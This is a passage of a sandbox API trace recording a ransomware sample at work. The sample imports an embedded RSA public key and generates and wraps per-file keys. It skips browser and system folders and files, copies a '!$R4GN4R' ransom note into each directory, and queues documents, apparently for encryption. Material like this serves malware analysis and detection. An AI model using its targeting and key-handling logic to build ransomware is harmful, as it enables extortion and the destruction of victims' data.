lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0174.719] GetProcessHeap () returned 0x3520000 [0174.719] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x8) returned 0x3586840 [0174.719] CryptAcquireContextW (in: phProv=0x3586840, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3586840*=0x3556bb0) returned 1 [0174.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 452 [0174.720] GetProcessHeap () returned 0x3520000 [0174.720] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x388) returned 0x358e580 [0174.720] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xecd090, cbMultiByte=-1, lpWideCharStr=0x358e580, cchWideChar=452 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n") returned 452 [0174.720] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0174.720] GetProcessHeap () returned 0x3520000 [0174.720] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0x126) returned 0x35cdc78 [0174.720] CryptStringToBinaryW (in: pszString="-----BEGIN PUBLIC KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x35cdc78, pcbBinary=0x5cfd640, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0174.720] GetProcessHeap () returned 0x3520000 [0174.720] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x358e580 | out: hHeap=0x3520000) returned 1 [0174.720] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x35cdc78, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634 | out: pvStructInfo=0x5cfd63c, pcbStructInfo=0x5cfd634) returned 1 [0174.720] CryptImportPublicKeyInfo (in: hCryptProv=0x3556bb0, dwCertEncodingType=0x1, pInfo=0x35948f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3594920*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3594928*, PublicKey.cUnusedBits=0x0), phKey=0x3586844 | out: phKey=0x3586844*=0x3548200) returned 1 [0174.720] GetProcessHeap () returned 0x3520000 [0174.721] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cdc78 | out: hHeap=0x3520000) returned 1 [0174.721] LocalFree (hMem=0x35948f0) returned 0x0 [0174.721] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35565d8) returned 1 [0174.722] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x28, pbBuffer=0x3613354 | out: pbBuffer=0x3613354) returned 1 [0174.722] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.722] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0174.724] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35565d8) returned 1 [0174.725] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0174.725] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.725] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0174.728] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0174.729] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x361337c | out: pbBuffer=0x361337c) returned 1 [0174.729] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.729] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0174.770] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35565d8) returned 1 [0174.770] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0174.770] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.770] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0174.773] CryptEncrypt (in: hKey=0x3548200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x361339c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.773] GetLastError () returned 0x80090016 [0174.774] CryptEncrypt (in: hKey=0x3548200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x361349c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.774] GetLastError () returned 0x80090016 [0174.774] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x3606430, dwCreationFlags=0x0, lpThreadId=0x5cfdd80 | out: lpThreadId=0x5cfdd80*=0x13a4) returned 0x3b4 [0174.774] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x35565d8) returned 1 [0174.775] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x28, pbBuffer=0x5d1cf74 | out: pbBuffer=0x5d1cf74) returned 1 [0174.775] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.775] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0174.778] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x35565d8) returned 1 [0174.778] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0174.778] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.778] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0174.781] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35565d8) returned 1 [0174.781] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x20, pbBuffer=0x5d1cf9c | out: pbBuffer=0x5d1cf9c) returned 1 [0174.781] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.781] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0174.784] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x35565d8) returned 1 [0174.785] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0174.785] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0174.785] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0174.787] CryptEncrypt (in: hKey=0x3548200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d1cfbc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.788] GetLastError () returned 0x80090016 [0174.788] CryptEncrypt (in: hKey=0x3548200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d1d0bc*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0174.788] GetLastError () returned 0x80090016 [0174.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d10050, dwCreationFlags=0x0, lpThreadId=0x5cfdd84 | out: lpThreadId=0x5cfdd84*=0x13a0) returned 0x3f0 [0174.870] WaitForMultipleObjects (nCount=0x2, lpHandles=0x5cfe0d0*=0x3b4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0174.946] GetProcessHeap () returned 0x3520000 [0174.946] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3586840 | out: hHeap=0x3520000) returned 1 [0174.949] CloseHandle (hObject=0x3b4) returned 1 [0174.949] GetProcessHeap () returned 0x3520000 [0174.949] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0175.058] CloseHandle (hObject=0x3f0) returned 1 [0175.058] GetProcessHeap () returned 0x3520000 [0175.058] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d10050 | out: hHeap=0x3520000) returned 1 [0175.058] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0175.059] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1043", cAlternateFileName="")) returned 1 [0175.060] lstrcmpiW (lpString1="1043", lpString2=".") returned 1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="..") returned 1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Windows") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Windows.old") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Tor browser") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Internet Explorer") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Google") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Opera") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Opera Software") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Mozilla") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="Mozilla Firefox") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="$Recycle.Bin") returned 1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="ProgramData") returned -1 [0175.060] lstrcmpiW (lpString1="1043", lpString2="All Users") returned -1 [0175.060] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0175.060] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1043" | out: lpString1="1043") returned="1043" [0175.060] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\" [0175.060] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1043\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\" [0175.060] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\!$R4GN4R_B8CF767A$!.txt" [0175.060] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1043\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0175.066] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*" [0175.066] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.066] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.066] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0175.066] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547fc0 [0175.067] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0175.067] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf5ae37d1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.068] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0175.068] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0175.068] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ae37d1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5ae37d1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.068] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0175.069] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0175.069] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.069] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0175.069] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0175.069] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.069] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0175.069] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0175.069] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 1 [0175.069] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0175.069] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0175.069] FindNextFileW (in: hFindFile=0x3547fc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="")) returned 0 [0175.069] FindClose (in: hFindFile=0x3547fc0 | out: hFindFile=0x3547fc0) returned 1 [0175.070] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547cc0 [0175.070] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf5ae37d1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf5ae37d1, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0175.071] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ae37d1, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf5ae37d1, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0175.071] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.071] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0175.071] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0175.071] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0175.071] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0175.071] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0175.071] lstrcpyW (in: lpString1=0x5cfdaaa, lpString2="eula.rtf" | out: lpString1="eula.rtf") returned="eula.rtf" [0175.071] PathFindExtensionW (pszPath="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned=".rtf" [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 1 [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="autorun.inf") returned 1 [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="boot.ini") returned 1 [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="bootfont.bin") returned 1 [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="bootsect.bak") returned 1 [0175.071] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr") returned 1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgr.efi") returned 1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="bootmgfw.efi") returned 1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="desktop.ini") returned 1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="iconcache.db") returned -1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="ntldr") returned -1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat") returned -1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.dat.log") returned -1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="ntuser.ini") returned -1 [0175.072] lstrcmpiW (lpString1="eula.rtf", lpString2="thumbs.db") returned -1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".db") returned 1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".msi") returned 1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".drv") returned 1 [0175.072] lstrcmpiW (lpString1=".rtf", lpString2=".exe") returned 1 [0175.072] GetProcessHeap () returned 0x3520000 [0175.072] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xd16c) returned 0x3606430 [0175.073] lstrcpyW (in: lpString1=0x3606830, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" [0175.073] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0175.073] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*.*", nBufferLength=0x104, lpBuffer=0x5cfda6c, lpFilePart=0x5cfe338 | out: 